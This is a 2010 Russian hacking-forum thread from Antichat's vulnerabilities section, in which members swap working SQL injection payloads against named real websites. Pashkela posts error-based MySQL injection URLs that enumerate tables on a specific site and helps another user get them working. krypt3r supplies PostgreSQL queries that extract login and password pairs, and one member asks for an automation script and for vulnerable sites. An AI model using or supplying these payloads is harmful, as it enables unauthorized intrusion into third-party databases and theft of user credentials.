ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11601  
Старый 16.02.2010, 06:45
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Pashkela  
Код:
http://www.bombardier.cv.ua/boat2.php?id_boat2=(select*from(select+name_const(version(),1),name_const(version(),1))a)
о4ень спасибо ну моjэт подробнее ??

a vot zdes ??

http://www.aspik.am/index.php?p=-5+union+select+1

Последний раз редактировалось LokbatanLi; 16.02.2010 в 07:00..
 
Ответить с цитированием

  #11602  
Старый 16.02.2010, 08:10
Аватар для krypt3r
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Цитата:
Сообщение от samarin  
Как вывести информацию в виде loginasswd?
Например, так
Код:
select (login||chr(58)||passwd)::text::boolean from (select passwd,login from logins limit 1 offset 1)q;----
или так
Код:
select a::text::boolean from (select (login||chr(58)||passwd) as a from logins limit 1 offset 1)q;----
 
Ответить с цитированием

  #11603  
Старый 16.02.2010, 08:58
Аватар для samarin
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

krypt3r
Спасибо! Вы как всегда на высоте
Spyder
Цитата:
Пробуй с подзапросами, тогда лимит должен работать
select (select table_name from information_schema.tables limit 1 offset 1)::text::boolean
Тоже спасибо! Это мы уже с krypt3r-ом разобрали.

Вот бы скриптик, для автоматического перебора оффсета, с авторизацией и https и я бы от всех отстал (можетбыть...)

И подкиньте сайтик, может у кого завалялся, с доступом к usesuper для образовательных целей

Последний раз редактировалось samarin; 16.02.2010 в 09:10..
 
Ответить с цитированием

  #11604  
Старый 17.02.2010, 18:26
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Помогите здесь скулю раскрутить:
http://zub.by/menu.php?form_id=1
Ввожу количество полей и всегда ошибка.
 
Ответить с цитированием

  #11605  
Старый 17.02.2010, 18:42
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
http://zub.by/menu.php?form_id=(select*from(select+name_const(version(),1),name_const(version(),1))a)
 
Ответить с цитированием

  #11606  
Старый 17.02.2010, 18:57
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Pashkela У меня ошибка при таком вводе
А зависит ли это от браузера?
 
Ответить с цитированием

  #11607  
Старый 17.02.2010, 19:02
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Правильно, ошибка, ты ошибку-то почитай
(5.0.51a-24)

PS: От версии браузера не зависит

Код:
http://zub.by/menu.php?form_id=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),1),name_const((select+table_name+from+information_schema.tables+limit+0,1),1))a)


http://zub.by/menu.php?form_id=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+1,1),1),name_const((select+table_name+from+information_schema.tables+limit+1,1),1))a)

.....

Последний раз редактировалось Pashkela; 17.02.2010 в 19:07..
 
Ответить с цитированием

  #11608  
Старый 17.02.2010, 19:14
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
Правильно, ошибка, ты ошибку-то почитай
(5.0.51a-24)

PS: От версии браузера не зависит
У меня ничего подобного, вот смотри, что у меня:

Цитата:
# select parent_id, IF(id in (select menu_id from pl_user_settings),1,0) as access from pl_menu_menu where id = (select*from(select name_const(ve rsion(),1),name_const(version(),1))a)
# You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rsion(),1),name_const(version(),1))a)' at line 2
 
Ответить с цитированием

  #11609  
Старый 17.02.2010, 19:19
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от CyberHunter  
У меня ничего подобного, вот смотри, что у меня:
э, мен, ссылку когда отсюда копируешь, пробелы убирай, тут они специально расставляются, от таких как ты

Сам подумай, откуда в url могут быть ПРОБЕЛЫ
 
Ответить с цитированием

  #11610  
Старый 17.02.2010, 19:21
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
э, мен, ссылку когда отсюда копируешь, пробелы убирай, тут они специально расставляются, от таких как ты

Сам подумай, откуда в url могут быть ПРОБЕЛЫ
Об этом и хотел спросить
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ